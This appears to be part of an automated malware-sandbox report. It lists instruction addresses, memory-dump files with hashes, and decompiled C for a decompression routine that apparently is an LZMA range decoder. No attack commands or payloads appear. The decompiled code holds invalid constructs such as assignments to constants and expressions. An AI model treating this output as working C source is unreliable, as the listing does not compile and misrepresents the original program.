                                                  0x004069b0
                                                  0x00406942
                                                  0x00406948
                                                  0x0040694b
                                                  0x0040694e
                                                  0x00406951
                                                  0x00406954
                                                  0x00406957
                                                  0x0040695a
                                                  0x0040695d
                                                  0x00406960
                                                  0x00406963
                                                  0x0040697c
                                                  0x0040697f
                                                  0x00406982
                                                  0x00406985
                                                  0x00406989
                                                  0x0040698b
                                                  0x0040698b
                                                  0x0040698c
                                                  0x0040698f
                                                  0x00406965
                                                  0x00406965
                                                  0x0040696d
                                                  0x00406972
                                                  0x00406974
                                                  0x00406977
                                                  0x00406977
                                                  0x00406992
                                                  0x00406999
                                                  0x00000000
                                                  0x0040699b
                                                  0x00000000
                                                  0x0040699b
                                                  0x00000000
                                                  0x00406637
                                                  0x0040663a
                                                  0x00406670
                                                  0x004067a0
                                                  0x004067a0
                                                  0x004067a0
                                                  0x004067a0
                                                  0x004067a3
                                                  0x004067a3
                                                  0x004067a6
                                                  0x004067a8
                                                  0x00406a32
                                                  0x00000000
                                                  0x00406a32
                                                  0x004067ae
                                                  0x004067b1
                                                  0x00000000
                                                  0x00000000
                                                  0x004067b7
                                                  0x004067bb
                                                  0x004067be
                                                  0x004067be
                                                  0x004067be
                                                  0x00000000
                                                  0x004067be
                                                  0x0040663c
                                                  0x0040663e
                                                  0x00406640
                                                  0x00406642
                                                  0x00406645
                                                  0x00406646
                                                  0x00406648
                                                  0x0040664a
                                                  0x0040664d
                                                  0x00406650
                                                  0x00406666
                                                  0x0040666b
                                                  0x004066a3
                                                  0x004066a3
                                                  0x004066a7
                                                  0x004066d3
                                                  0x004066d5
                                                  0x004066dc
                                                  0x004066df
                                                  0x004066e2
                                                  0x004066e2
                                                  0x004066e7
                                                  0x004066e7
                                                  0x004066e9
                                                  0x004066ec
                                                  0x004066f3
                                                  0x004066f6
                                                  0x00406723
                                                  0x00406723
                                                  0x00406726
                                                  0x00406729
                                                  0x0040679d
                                                  0x0040679d
                                                  0x0040679d
                                                  0x00000000
                                                  0x0040679d
                                                  0x0040672b
                                                  0x00406731
                                                  0x00406734
                                                  0x00406737
                                                  0x0040673a
                                                  0x0040673d
                                                  0x00406740
                                                  0x00406743
                                                  0x00406746
                                                  0x00406749
                                                  0x0040674c
                                                  0x00406765
                                                  0x00406767
                                                  0x0040676a
                                                  0x0040676b
                                                  0x0040676e
                                                  0x00406770
                                                  0x00406773
                                                  0x00406775
                                                  0x00406777
                                                  0x0040677a
                                                  0x0040677c
                                                  0x0040677f
                                                  0x00406783
                                                  0x00406785
                                                  0x00406785
                                                  0x00406786
                                                  0x00406789
                                                  0x0040678c
                                                  0x0040674e
                                                  0x0040674e
                                                  0x00406756
                                                  0x0040675b
                                                  0x0040675d
                                                  0x00406760
                                                  0x00406760
                                                  0x0040678f
                                                  0x00406796
                                                  0x00406720
                                                  0x00406720
                                                  0x00406720
                                                  0x00406720
                                                  0x00000000
                                                  0x00406798
                                                  0x00000000
                                                  0x00406798
                                                  0x00406796
                                                  0x004066a9
                                                  0x004066ac
                                                  0x004066ae
                                                  0x004066b1
                                                  0x004066b4
                                                  0x004066b7
                                                  0x004066b9
                                                  0x004066bc
                                                  0x004066bf
                                                  0x004066bf
                                                  0x004066c2
                                                  0x004066c2
                                                  0x004066c5
                                                  0x004066cc
                                                  0x004066a0
                                                  0x004066a0
                                                  0x004066a0
                                                  0x004066a0
                                                  0x00000000
                                                  0x004066ce
                                                  0x00000000
                                                  0x004066ce
                                                  0x004066cc
                                                  0x00406652
                                                  0x00406655
                                                  0x00406657
                                                  0x0040665a
                                                  0x00000000
                                                  0x00000000
                                                  0x004063b9
                                                  0x004063b9
                                                  0x004063bd
                                                  0x00406a02
                                                  0x00000000
                                                  0x00406a02
                                                  0x004063c3
                                                  0x004063c6
                                                  0x004063c9
                                                  0x004063cc
                                                  0x004063cf
                                                  0x004063d2
                                                  0x004063d5
                                                  0x004063d7
                                                  0x004063da
                                                  0x004063dd
                                                  0x004063e0
                                                  0x004063e2
                                                  0x004063e2
                                                  0x004063e2
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x004067c1
                                                  0x004067c1
                                                  0x004067c1
                                                  0x004067c5
                                                  0x00000000
                                                  0x00000000
                                                  0x004067cb
                                                  0x004067ce
                                                  0x004067d1
                                                  0x004067d4
                                                  0x004067d6
                                                  0x004067d6
                                                  0x004067d6
                                                  0x004067d9
                                                  0x004067dc
                                                  0x004067df
                                                  0x004067e2
                                                  0x004067e5
                                                  0x004067e8
                                                  0x004067e9
                                                  0x004067eb
                                                  0x004067eb
                                                  0x004067eb
                                                  0x004067ee
                                                  0x004067f1
                                                  0x004067f4
                                                  0x004067f7
                                                  0x004067fa
                                                  0x004067fe
                                                  0x00406800
                                                  0x00406803
                                                  0x00000000
                                                  0x00406805
                                                  0x00000000
                                                  0x00406805
                                                  0x00406803
                                                  0x00406a38
                                                  0x00000000
                                                  0x00000000
                                                  0x00406067

                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.472967159.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.472962160.0000000000400000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.472975056.0000000000407000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.473674188.0000000000409000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.473725304.0000000000422000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.473730999.000000000042A000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.473739098.000000000042D000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 7dec09a748792e581ac56a4790c1b6395b646ad41e7ca9f7da80e9268b46833e
                                                  • Instruction ID: 178f069459afe4b8f6f8f854f87fc4d5347ab2ec506c5a0858b6a976d85c5aaa
                                                  • Opcode Fuzzy Hash: 7dec09a748792e581ac56a4790c1b6395b646ad41e7ca9f7da80e9268b46833e
                                                  • Instruction Fuzzy Hash: 8E816871E00228CFDF24DFA8C8447ADBBB1FB45301F25816AD816BB281C7785A96DF44
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00406025, Relevance: 5.2, APIs: 4, Instructions: 198COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 98%
                                                  			E00406025(void* __ecx) {
				void* _v8;
				void* _v12;
				signed int _v16;
				unsigned int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v95;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				intOrPtr _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				void _v140;
				void* _v148;
				signed int _t537;
				signed int _t538;
				signed int _t572;

				_t572 = 0x22;
				_v148 = __ecx;
				memcpy( &_v140, __ecx, _t572 << 2);
				if(_v52 == 0xffffffff) {
					return 1;
				}
				while(1) {
					L3:
					_t537 = _v140;
					if(_t537 > 0x1c) {
						break;
					}
					switch( *((intOrPtr*)(_t537 * 4 +  &M00406A77))) {
						case 0:
							__eflags = _v112;
							if(_v112 == 0) {
								goto L173;
							}
							_v112 = _v112 - 1;
							_v116 = _v116 + 1;
							_t537 =  *_v116;
							__eflags = _t537 - 0xe1;
							if(_t537 > 0xe1) {
								goto L174;
							}
							_t542 = _t537 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t576);
							_push(9);
							_pop(_t577);
							_t622 = _t542 / _t576;
							_t544 = _t542 % _t576 & 0x000000ff;
							asm("cdq");
							_t617 = _t544 % _t577 & 0x000000ff;
							_v64 = _t617;
							_v32 = (1 << _t622) - 1;
							_v28 = (1 << _t544 / _t577) - 1;
							_t625 = (0x300 << _t617 + _t622) + 0x736;
							__eflags = 0x600 - _v124;
							if(0x600 == _v124) {
								L12:
								__eflags = _t625;
								if(_t625 == 0) {
									L14:
									_v76 = _v76 & 0x00000000;
									_v68 = _v68 & 0x00000000;
									goto L17;
								} else {
									goto L13;
								}
								do {
									L13:
									_t625 = _t625 - 1;
									__eflags = _t625;
									 *((short*)(_v8 + _t625 * 2)) = 0x400;
								} while (_t625 != 0);
								goto L14;
							}
							__eflags = _v8;
							if(_v8 != 0) {
								GlobalFree(_v8);
							}
							_t537 = GlobalAlloc(0x40, 0x600); // executed
							__eflags = _t537;
							_v8 = _t537;
							if(_t537 == 0) {
								goto L174;
							} else {
								_v124 = 0x600;
								goto L12;
							}
						case 1:
							L15:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 1;
								goto L173;
							}
							_v112 = _v112 - 1;
							_v68 = _v68 | ( *_v116 & 0x000000ff) << _v76 << 0x00000003;
							_v116 = _v116 + 1;
							_t50 =  &_v76;
							 *_t50 = _v76 + 1;
							__eflags =  *_t50;
							L17:
							__eflags = _v76 - 4;
							if(_v76 < 4) {
								goto L15;
							}
							_t550 = _v68;
							__eflags = _t550 - _v120;
							if(_t550 == _v120) {
								L22:
								_v76 = 5;
								 *(_v12 + _v120 - 1) =  *(_v12 + _v120 - 1) & 0x00000000;
								goto L25;
							}
							__eflags = _v12;
							_v120 = _t550;
							if(_v12 != 0) {
								GlobalFree(_v12); // executed
							}
							_t537 = GlobalAlloc(0x40, _v68); // executed
							__eflags = _t537;
							_v12 = _t537;
							if(_t537 == 0) {
								goto L174;
							} else {
								goto L22;
							}
						case 2:
							L26:
							_t557 = _v100 & _v32;
							_v136 = 6;
							_v80 = _t557;
							_t626 = _v8 + ((_v60 << 4) + _t557) * 2;
							goto L135;
						case 3:
							L23:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 3;
								goto L173;
							}
							_v112 = _v112 - 1;
							_t72 =  &_v116;
							 *_t72 = _v116 + 1;
							__eflags =  *_t72;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L25:
							_v76 = _v76 - 1;
							__eflags = _v76;
							if(_v76 != 0) {
								goto L23;
							}
							goto L26;
						case 4:
							L136:
							_t559 =  *_t626;
							_t610 = _t559 & 0x0000ffff;
							_t591 = (_v20 >> 0xb) * _t610;
							__eflags = _v16 - _t591;
							if(_v16 >= _t591) {
								_v20 = _v20 - _t591;
								_v16 = _v16 - _t591;
								_v68 = 1;
								_t560 = _t559 - (_t559 >> 5);
								__eflags = _t560;
								 *_t626 = _t560;
							} else {
								_v20 = _t591;
								_v68 = _v68 & 0x00000000;
								 *_t626 = (0x800 - _t610 >> 5) + _t559;
							}
							__eflags = _v20 - 0x1000000;
							if(_v20 >= 0x1000000) {
								goto L142;
							} else {
								goto L140;
							}
						case 5:
							L140:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 5;
								goto L173;
							}
							_v20 = _v20 << 8;
							_v112 = _v112 - 1;
							_t464 =  &_v116;
							 *_t464 = _v116 + 1;
							__eflags =  *_t464;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L142:
							_t561 = _v136;
							goto L143;
						case 6:
							__edx = 0;
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v56 = 1;
								_v136 = 7;
								__esi = _v8 + 0x180 + _v60 * 2;
								goto L135;
							}
							__eax = _v96 & 0x000000ff;
							__esi = _v100;
							__cl = 8;
							__cl = 8 - _v64;
							__esi = _v100 & _v28;
							__eax = (_v96 & 0x000000ff) >> 8;
							__ecx = _v64;
							__esi = (_v100 & _v28) << 8;
							__ecx = _v8;
							((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2;
							__eax = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9;
							__eflags = _v60 - 4;
							__eax = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
							_v92 = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
							if(_v60 >= 4) {
								__eflags = _v60 - 0xa;
								if(_v60 >= 0xa) {
									_t103 =  &_v60;
									 *_t103 = _v60 - 6;
									__eflags =  *_t103;
								} else {
									_v60 = _v60 - 3;
								}
							} else {
								_v60 = 0;
							}
							__eflags = _v56 - __edx;
							if(_v56 == __edx) {
								__ebx = 0;
								__ebx = 1;
								goto L63;
							}
							__eax = _v24;
							__eax = _v24 - _v48;
							__eflags = __eax - _v120;
							if(__eax >= _v120) {
								__eax = __eax + _v120;
								__eflags = __eax;
							}
							__ecx = _v12;
							__ebx = 0;
							__ebx = 1;
							__al =  *((intOrPtr*)(__eax + __ecx));
							_v95 =  *((intOrPtr*)(__eax + __ecx));
							goto L43;
						case 7:
							__eflags = _v68 - 1;
							if(_v68 != 1) {
								__eax = _v40;
								_v132 = 0x16;
								_v36 = _v40;
								__eax = _v44;
								_v40 = _v44;
								__eax = _v48;
								_v44 = _v48;
								__eax = 0;
								__eflags = _v60 - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								_v60 = (__eflags >= 0) - 1 + 0xa;
								__eax = _v8;
								__eax = _v8 + 0x664;
								__eflags = __eax;
								_v92 = __eax;
								goto L71;
							}
							__eax = _v8;
							__ecx = _v60;
							_v136 = 8;
							__esi = _v8 + 0x198 + _v60 * 2;
							goto L135;
						case 8:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v136 = 0xa;
								__esi = _v8 + 0x1b0 + _v60 * 2;
							} else {
								__eax = _v60;
								__ecx = _v8;
								__eax = _v60 + 0xf;
								_v136 = 9;
								_v60 + 0xf << 4 = (_v60 + 0xf << 4) + _v80;
								__esi = _v8 + ((_v60 + 0xf << 4) + _v80) * 2;
							}
							goto L135;
						case 9:
							__eflags = _v68;
							if(_v68 != 0) {
								goto L92;
							}
							__eflags = _v100;
							if(_v100 == 0) {
								goto L174;
							}
							__eax = 0;
							__eflags = _v60 - 7;
							_t264 = _v60 - 7 >= 0;
							__eflags = _t264;
							0 | _t264 = _t264 + _t264 + 9;
							_v60 = _t264 + _t264 + 9;
							goto L78;
						case 0xa:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v136 = 0xb;
								__esi = _v8 + 0x1c8 + _v60 * 2;
								goto L135;
							}
							__eax = _v44;
							goto L91;
						case 0xb:
							__eflags = _v68;
							if(_v68 != 0) {
								__ecx = _v40;
								__eax = _v36;
								_v36 = _v40;
							} else {
								__eax = _v40;
							}
							__ecx = _v44;
							_v40 = _v44;
							L91:
							__ecx = _v48;
							_v48 = __eax;
							_v44 = _v48;
							L92:
							__eax = _v8;
							_v132 = 0x15;
							__eax = _v8 + 0xa68;
							_v92 = _v8 + 0xa68;
							goto L71;
						case 0xc:
							L102:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xc;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t340 =  &_v116;
							 *_t340 = _v116 + 1;
							__eflags =  *_t340;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							__eax = _v48;
							goto L104;
						case 0xd:
							L39:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xd;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t127 =  &_v116;
							 *_t127 = _v116 + 1;
							__eflags =  *_t127;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L41:
							__eax = _v68;
							__eflags = _v76 - _v68;
							if(_v76 != _v68) {
								goto L50;
							}
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								goto L56;
							}
							L43:
							__eax = _v95 & 0x000000ff;
							_v95 = _v95 << 1;
							__ecx = _v92;
							__eax = (_v95 & 0x000000ff) >> 7;
							_v76 = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi = _v92 + __eax * 2;
							_v20 = _v20 >> 0xb;
							__ax =  *__esi;
							_v88 = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edx;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								_v68 = 1;
								__cx = __ax >> 5;
								__eflags = __eax;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								_v68 = _v68 & 0x00000000;
								_v20 = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							_v72 = __ebx;
							if(_v20 >= 0x1000000) {
								goto L41;
							} else {
								goto L39;
							}
						case 0xe:
							L48:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xe;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t161 =  &_v116;
							 *_t161 = _v116 + 1;
							__eflags =  *_t161;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							while(1) {
								L50:
								__eflags = __ebx - 0x100;
								if(__ebx >= 0x100) {
									break;
								}
								__eax = _v92;
								__edx = __ebx + __ebx;
								__ecx = _v20;
								__esi = __edx + __eax;
								__ecx = _v20 >> 0xb;
								__ax =  *__esi;
								_v88 = __esi;
								__edi = __ax & 0x0000ffff;
								__ecx = (_v20 >> 0xb) * __edi;
								__eflags = _v16 - __ecx;
								if(_v16 >= __ecx) {
									_v20 = _v20 - __ecx;
									_v16 = _v16 - __ecx;
									__cx = __ax;
									_t175 = __edx + 1; // 0x1
									__ebx = _t175;
									__cx = __ax >> 5;
									__eflags = __eax;
									 *__esi = __ax;
								} else {
									_v20 = __ecx;
									0x800 = 0x800 - __edi;
									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
									__ebx = __ebx + __ebx;
									 *__esi = __cx;
								}
								__eflags = _v20 - 0x1000000;
								_v72 = __ebx;
								if(_v20 >= 0x1000000) {
									continue;
								} else {
									goto L48;
								}
							}
							L56:
							_t178 =  &_v56;
							 *_t178 = _v56 & 0x00000000;
							__eflags =  *_t178;
							goto L57;
						case 0xf:
							L60:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xf;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t208 =  &_v116;
							 *_t208 = _v116 + 1;
							__eflags =  *_t208;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L62:
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								L57:
								__al = _v72;
								_v96 = _v72;
								goto L58;
							}
							L63:
							__eax = _v92;
							__edx = __ebx + __ebx;
							__ecx = _v20;
							__esi = __edx + __eax;
							__ecx = _v20 >> 0xb;
							__ax =  *__esi;
							_v88 = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edi;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								_t222 = __edx + 1; // 0x1
								__ebx = _t222;
								__cx = __ax >> 5;
								__eflags = __eax;
								 *__esi = __ax;
							} else {
								_v20 = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							_v72 = __ebx;
							if(_v20 >= 0x1000000) {
								goto L62;
							} else {
								goto L60;
							}
						case 0x10:
							L112:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0x10;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t371 =  &_v116;
							 *_t371 = _v116 + 1;
							__eflags =  *_t371;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							goto L114;
						case 0x11:
							L71:
							__esi = _v92;
							_v136 = 0x12;
							goto L135;
						case 0x12:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v92;
								_v136 = 0x13;
								__esi = _v92 + 2;
								L135:
								_v88 = _t626;
								goto L136;
							}
							__eax = _v80;
							_v52 = _v52 & 0x00000000;
							__ecx = _v92;
							__eax = _v80 << 4;
							__eflags = __eax;
							__eax = _v92 + __eax + 4;
							goto L133;
						case 0x13:
							__eflags = _v68;
							if(_v68 != 0) {
								_t475 =  &_v92;
								 *_t475 = _v92 + 0x204;
								__eflags =  *_t475;
								_v52 = 0x10;
								_v68 = 8;
								L147:
								_v128 = 0x14;
								goto L148;
							}
							__eax = _v80;
							__ecx = _v92;
							__eax = _v80 << 4;
							_v52 = 8;
							__eax = _v92 + (_v80 << 4) + 0x104;
							L133:
							_v92 = __eax;
							_v68 = 3;
							goto L147;
						case 0x14:
							_v52 = _v52 + __ebx;
							__eax = _v132;
							goto L143;
						case 0x15:
							__eax = 0;
							__eflags = _v60 - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							_v60 = (__eflags >= 0) - 1 + 0xb;
							goto L123;
						case 0x16:
							__eax = _v52;
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx = _v8;
							_v68 = 6;
							__eax = __eax << 7;
							_v128 = 0x19;
							_v92 = __eax;
							goto L148;
						case 0x17:
							L148:
							__eax = _v68;
							_v84 = 1;
							_v76 = _v68;
							goto L152;
						case 0x18:
							L149:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0x18;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t490 =  &_v116;
							 *_t490 = _v116 + 1;
							__eflags =  *_t490;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L151:
							_t493 =  &_v76;
							 *_t493 = _v76 - 1;
							__eflags =  *_t493;
							L152:
							__eflags = _v76;
							if(_v76 <= 0) {
								__ecx = _v68;
								__ebx = _v84;
								0 = 1;
								__eax = 1 << __cl;
								__ebx = _v84 - (1 << __cl);
								__eax = _v128;
								_v72 = __ebx;
								L143:
								_v140 = _t561;
								goto L3;
							}
							__eax = _v84;
							_v20 = _v20 >> 0xb;
							__edx = _v84 + _v84;
							__eax = _v92;
							__esi = __edx + __eax;
							_v88 = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edi;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								_v84 = __edx;
							} else {
								_v20 = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								_v84 = _v84 << 1;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							if(_v20 >= 0x1000000) {
								goto L151;
							} else {
								goto L149;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								_v48 = __ebx;
								L122:
								_t399 =  &_v48;
								 *_t399 = _v48 + 1;
								__eflags =  *_t399;
								L123:
								__eax = _v48;
								__eflags = __eax;
								if(__eax == 0) {
									_v52 = _v52 | 0xffffffff;
									goto L173;
								}
								__eflags = __eax - _v100;
								if(__eax > _v100) {
									goto L174;
								}
								_v52 = _v52 + 2;
								__eax = _v52;
								_t406 =  &_v100;
								 *_t406 = _v100 + _v52;
								__eflags =  *_t406;
								goto L126;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							_v48 = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								_v76 = __ecx;
								L105:
								__eflags = _v76;
								if(_v76 <= 0) {
									__eax = __eax + __ebx;
									_v68 = 4;
									_v48 = __eax;
									__eax = _v8;
									__eax = _v8 + 0x644;
									__eflags = __eax;
									L111:
									__ebx = 0;
									_v92 = __eax;
									_v84 = 1;
									_v72 = 0;
									_v76 = 0;
									L115:
									__eax = _v68;
									__eflags = _v76 - _v68;
									if(_v76 >= _v68) {
										_t397 =  &_v48;
										 *_t397 = _v48 + __ebx;
										__eflags =  *_t397;
										goto L122;
									}
									__eax = _v84;
									_v20 = _v20 >> 0xb;
									__edi = _v84 + _v84;
									__eax = _v92;
									__esi = __edi + __eax;
									_v88 = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = (_v20 >> 0xb) * __ecx;
									__eflags = _v16 - __edx;
									if(_v16 >= __edx) {
										__ecx = 0;
										_v20 = _v20 - __edx;
										__ecx = 1;
										_v16 = _v16 - __edx;
										__ebx = 1;
										__ecx = _v76;
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx = _v72;
										__ebx = _v72 | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										_v72 = __ebx;
										 *__esi = __ax;
										_v84 = __edi;
									} else {
										_v20 = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										_v84 = _v84 << 1;
										 *__esi = __dx;
									}
									__eflags = _v20 - 0x1000000;
									if(_v20 >= 0x1000000) {
										L114:
										_t374 =  &_v76;
										 *_t374 = _v76 + 1;
										__eflags =  *_t374;
										goto L115;
									} else {
										goto L112;
									}
								}
								__ecx = _v16;
								__ebx = __ebx + __ebx;
								_v20 = _v20 >> 1;
								__eflags = _v16 - _v20;
								_v72 = __ebx;
								if(_v16 >= _v20) {
									__ecx = _v20;
									_v16 = _v16 - _v20;
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									_v72 = __ebx;
								}
								__eflags = _v20 - 0x1000000;
								if(_v20 >= 0x1000000) {
									L104:
									_t344 =  &_v76;
									 *_t344 = _v76 - 1;
									__eflags =  *_t344;
									goto L105;
								} else {
									goto L102;
								}
							}
							__edx = _v8;
							__eax = __eax - __ebx;
							_v68 = __ecx;
							__eax = _v8 + 0x55e + __eax * 2;
							goto L111;
						case 0x1a:
							L58:
							__eflags = _v104;
							if(_v104 == 0) {
								_v140 = 0x1a;
								goto L173;
							}
							__ecx = _v108;
							__al = _v96;
							__edx = _v12;
							_v100 = _v100 + 1;
							_v108 = _v108 + 1;
							_v104 = _v104 - 1;
							 *_v108 = __al;
							__ecx = _v24;
							 *(_v12 + __ecx) = __al;
							__eax = __ecx + 1;
							__edx = 0;
							_t197 = __eax % _v120;
							__eax = __eax / _v120;
							__edx = _t197;
							goto L82;
						case 0x1b:
							L78:
							__eflags = _v104;
							if(_v104 == 0) {
								_v140 = 0x1b;
								goto L173;
							}
							__eax = _v24;
							__eax = _v24 - _v48;
							__eflags = __eax - _v120;
							if(__eax >= _v120) {
								__eax = __eax + _v120;
								__eflags = __eax;
							}
							__edx = _v12;
							__cl =  *(__edx + __eax);
							__eax = _v24;
							_v96 = __cl;
							 *(__edx + __eax) = __cl;
							__eax = __eax + 1;
							__edx = 0;
							_t280 = __eax % _v120;
							__eax = __eax / _v120;
							__edx = _t280;
							__eax = _v108;
							_v100 = _v100 + 1;
							_v108 = _v108 + 1;
							_t289 =  &_v104;
							 *_t289 = _v104 - 1;
							__eflags =  *_t289;
							 *_v108 = __cl;
							L82:
							_v24 = __edx;
							goto L83;
						case 0x1c:
							while(1) {
								L126:
								__eflags = _v104;
								if(_v104 == 0) {
									break;
								}
								__eax = _v24;
								__eax = _v24 - _v48;
								__eflags = __eax - _v120;
								if(__eax >= _v120) {
									__eax = __eax + _v120;
									__eflags = __eax;
								}
								__edx = _v12;
